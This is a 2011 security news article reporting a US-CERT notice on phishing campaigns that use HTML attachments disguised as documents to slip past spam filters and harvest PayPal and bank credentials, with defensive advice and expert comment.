Phishing Scheme Targets PayPal, BofA

Low-Tech Scam Uses Attachments to Fool Spam Filters

By , March 22, 2011.
Phishing Scheme Targets PayPal, BofA


See Also: Cloud Infrastructure: Same Security Needs, Dynamic New Environment

he United States Computer Emergency Readiness Team, part of the Department of Homeland Security, has issued a notice about ongoing phishing attacks targeting PayPal, Bank of America, Lloyds and TSB users.

The attacks get past spam filters using HTML webpage attachments, rather than traditional phishing e-mails that contain malicious links. "Many browsers utilize anti-phishing filters to help protect users against phishing attacks," US-CERT states. "This method of attack is able to bypass this security mechanism."

US-CERT encourages users and administrators to:

  • Not follow unsolicited links or attachments in e-mail;
  • Use caution when providing personal information online;
  • Verify the legitimacy of e-mail by contacting the sender directly;
  • Review common best practices for avoiding e-mail scams and socially engineered attacks.

Neil Schwartzman, founder and chief security specialist at Montreal-based CASL Consulting, says this mode of so-called attachment attack has been growing and has hit several large organizations, including FedEx and Canada Post, in the last month. "It's not even a sophisticated scheme," Schwartzman says. "It's almost unsophisticated, but it's clever."

Because the phishy HTML pages are e-mailed to unsuspecting recipients as attachments, spam filters have no overt URLs to scan and trap. "You create an HTML page and mail it as an attachment that's called a Word doc or a PDF, to trick the content filters," he says. "It's a way to circumvent the spam filter. The victim gets the e-mail, opens the attachment and then is sent to a legitimate website, before being routed to a site that's not legit, where, of course, the victim is asked to enter some kind of account information" or personal identifier, like a U.S. Social Security number.

"Obviously, PayPal is worried about the theft of actual PayPal credentials," Schwartzman says. But the way these phishy forms are set up, fraudsters are out to bilk what they can out of any company or consumer. "They're phishing for any kind of information that can lead to money, whether it is a Social Security number, a PayPal account or credit card information."

Follow Tracy Kitten on Twitter: @FraudBlogger

  • Print
  • Tweet Like LinkedIn share
Get permission to license our content for reuse in a myriad of ways.
ARTICLE How to Mitigate Shellshock Risks

As news of the Shellshock bug continues to spread, CISOs in all sectors are taking steps to...

Latest Tweets and Mentions

ARTICLE How to Mitigate Shellshock Risks

As news of the Shellshock bug continues to spread, CISOs in all sectors are taking steps to...

The ISMG Network